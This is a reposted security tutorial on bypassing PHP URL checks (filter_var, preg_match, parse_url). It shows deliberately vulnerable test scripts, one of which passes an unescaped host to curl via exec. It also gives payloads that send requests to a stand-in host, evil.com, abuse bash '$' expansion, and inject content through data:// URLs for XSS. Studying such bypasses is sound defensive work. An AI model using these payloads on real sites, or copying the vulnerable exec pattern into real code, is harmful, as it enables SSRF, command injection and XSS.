0x01 Foreword
Reposted from: Pino_HD
0x02 Code
<?php
echo "Argument: ".$argv[1]."\n";
// check if argument is a valid URL
if(filter_var($argv[1], FILTER_VALIDATE_URL)){
    // parse URL
    $r = parse_url($argv[1]);
    print_r($r);
    // check if host ends with baidu.com
    if(preg_match('/baidu\.com$/', $r['host'])){
        // get page from URL (the host is passed to the shell unescaped)
        exec('curl -v -s "'.$r['host'].'"', $a);
        print_r($a);
    }else{
        echo "Error: Host not allowed";
    }
}else{
    echo "Error: Invalid URL";
}
?>
This code validates the argument with filter_var(), checks the host with preg_match(), and parses the URL with parse_url(). Finally, it calls exec() to run the curl command against the URL.
Pay attention to parse_url(): it does not validate that the URL is correct.
0x03 Bypassing filter_var and preg_match
Many URLs contain special characters that carry a special meaning, and the semantics of each character depend on where it appears in the URL. The characters “;”, “/”, “?”, “:”, “@”, “=” and “&” are reserved. Apart from dot-segments in a hierarchical path, a path segment is considered opaque by the generic syntax. Applications that generate URIs often use the reserved characters allowed in a segment to delimit its parts. For example, “;” and “=” are often used to delimit parameters and parameter values, and the comma serves a similar purpose.
For example, one URI producer might use name;v=1.1 to refer to version 1.1 of name, while another might use name,1.1 to mean the same thing. For URLs, of course, the effect of these reserved characters depends on the algorithm that parses them.
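To make the delimiter roles concrete, here is a minimal PHP sketch that splits a segment on “;” and “=”. The helper name split_segment is hypothetical and only illustrates the convention described above; it is not a PHP built-in and not a full URI parser.

```php
<?php
// Hypothetical helper (not a PHP built-in): split a path segment such as
// "name;v=1.1" into its name and its ";key=value" parameters.
function split_segment(string $segment): array
{
    $pieces = explode(';', $segment);
    $name = array_shift($pieces);          // text before the first ';'
    $params = [];
    foreach ($pieces as $piece) {
        // Split each parameter on the first '=' only.
        $pair = explode('=', $piece, 2);
        $params[$pair[0]] = $pair[1] ?? '';
    }
    return ['name' => $name, 'params' => $params];
}

$result = split_segment('name;v=1.1');
print_r($result);
```

A parser that does not apply this convention simply sees one opaque string, and that difference between parsers is what the bypasses in this section rely on.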
For example, when a URL such as “http://evil.com;baidu.com” is handed to a tool like curl or wget, it is resolved as host: evil.com, querystring: baidu.com.
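PHP sees the same string differently. The sketch below is an illustration, with evil.com standing in for an attacker-controlled host. It shows that parse_url() keeps the “;” inside the host, so the suffix check from the test script passes on its own.

```php
<?php
// Assumption: evil.com stands in for an attacker-controlled host.
$url = 'http://evil.com;baidu.com';

// parse_url() only ends the host at '/', '?' or '#', so ';' stays inside it.
$parts = parse_url($url);
echo $parts['host'], "\n";

// The same suffix check the test script uses.
$allowed = preg_match('/baidu\.com$/', $parts['host']);
var_dump($allowed === 1);
```

The regular expression only anchors the end of the host string, so anything placed before baidu.com is accepted.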
Running the code with this URL returns the error Invalid URL, because filter_var has not been bypassed yet. filter_var accepts a variety of schemes, so we can try a scheme other than http, such as:
0://evil.com;baidu.com
This successfully bypasses both filter_var and preg_match. However, the URL still does not resolve. Do not worry: because the scheme is not http, the default port is not 80, so we add the port number explicitly:
0://evil.com:80;baidu.com:80
Resolution succeeds!
Of course, as mentioned earlier, a comma can serve the same purpose as the semicolon.
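The three URLs from this section can be compared side by side with a short sketch. It only runs the checks from the test script and never calls curl; the $report array and its keys are names chosen for this illustration.

```php
<?php
// URLs discussed in this section; evil.com is a stand-in attacker host.
$candidates = [
    'http://evil.com;baidu.com',
    '0://evil.com;baidu.com',
    '0://evil.com:80;baidu.com:80',
];

$report = [];
foreach ($candidates as $url) {
    // filter_var() returns the URL on success and false on failure.
    $valid = filter_var($url, FILTER_VALIDATE_URL) !== false;
    $parts = parse_url($url);
    $host = (is_array($parts) && isset($parts['host'])) ? $parts['host'] : '';
    $report[$url] = [
        'valid' => $valid,
        'host' => $host,
        'host_allowed' => preg_match('/baidu\.com$/', $host) === 1,
    ];
}
print_r($report);
```

The http URL should fail validation while the two 0:// URLs pass, because filter_var only applies hostname rules to http and https URLs.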
0x03 Bypassing parse_url
The parse_url function is not meant to verify that a URL is correct. It parses the URL as best it can and splits it into its components. In this case, we can bypass the check by turning part of the URL into a variable:
0://evil$baidu.com
Note that this applies to a PHP 5 environment; under PHP 7, parse_url automatically parses out $baidu.com.
In bash, $var is a variable. Here the variable $baidu is not defined, so it expands to an empty string. The URL therefore becomes 0://evil<empty>.com, that is, 0://evil.com. Bypass successful!
This approach has its limitations, however. It relies on bash behavior, so it only works when the PHP script uses a command execution function such as exec() or system() to run a command like curl or wget.
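The shell expansion can be observed without fetching anything. The sketch below assumes a POSIX shell in which no variable named baidu is set, and it uses echo as a stand-in for curl.

```php
<?php
// Single quotes: PHP itself does not interpolate $baidu here.
$host = 'evil$baidu.com';

// The suffix check from the test script still sees "baidu.com" at the end.
$hostAllowed = preg_match('/baidu\.com$/', $host) === 1;

// Assumption: POSIX shell, no "baidu" variable set. Inside double quotes
// the shell expands $baidu to an empty string before the command runs.
$output = [];
exec('echo "' . $host . '"', $output);
echo $output[0], "\n";
```

The string that PHP validated and the string that the command receives are therefore different, which is why this only affects scripts that build shell commands.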
0x04 The data:// pseudo-protocol and XSS exploitation
Unlike the exec example above, here we use the file_get_contents function. The PHP test code is as follows:
<?php
echo "Argument: ".$argv[1]."\n";
// check if argument is a valid URL
if(filter_var($argv[1], FILTER_VALIDATE_URL)) {
    // parse URL
    $r = parse_url($argv[1]);
    print_r($r);
    // check if host ends with baidu.com
    if(preg_match('/baidu\.com$/', $r['host'])) {
        // get page from URL
        $a = file_get_contents($argv[1]);
        echo($a);
    } else {
        echo "Error: Host not allowed";
    }
} else {
    echo "Error: Invalid URL";
}
?>
Our task is to modify the content of the response body by adding the text “Hacked by Pino_HD”:
data://text/plain;base64,SGFja2VkIGJ5IFBpbm8Kbaidu.com
We find that parse_url sets host to text, so the script reports the Host not allowed error. But do not worry: we can inject something into the MIME type position, because PHP does not care about the MIME type.
data://baidu.com/plain;base64,SGFja2VkIGJ5IFBpbm8K
This successfully writes the content we want into the response. Since we control the content of the response body, this can lead to XSS.
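The final payload can be checked in isolation with a minimal sketch, assuming allow_url_fopen is enabled (the PHP default). Note that the base64 string used in this article decodes to “Hacked by Pino” followed by a newline.

```php
<?php
// Assumption: allow_url_fopen is on, which the data:// wrapper requires.
$url = 'data://baidu.com/plain;base64,SGFja2VkIGJ5IFBpbm8K';

// parse_url() reports the text in the MIME type position as the host.
$parts = parse_url($url);
echo $parts['host'], "\n";

// file_get_contents() ignores the bogus MIME type and decodes the payload.
$body = file_get_contents($url);
echo $body;
```

The host check passes because the allowed domain sits where the MIME type would normally be, while the returned body is entirely attacker-controlled.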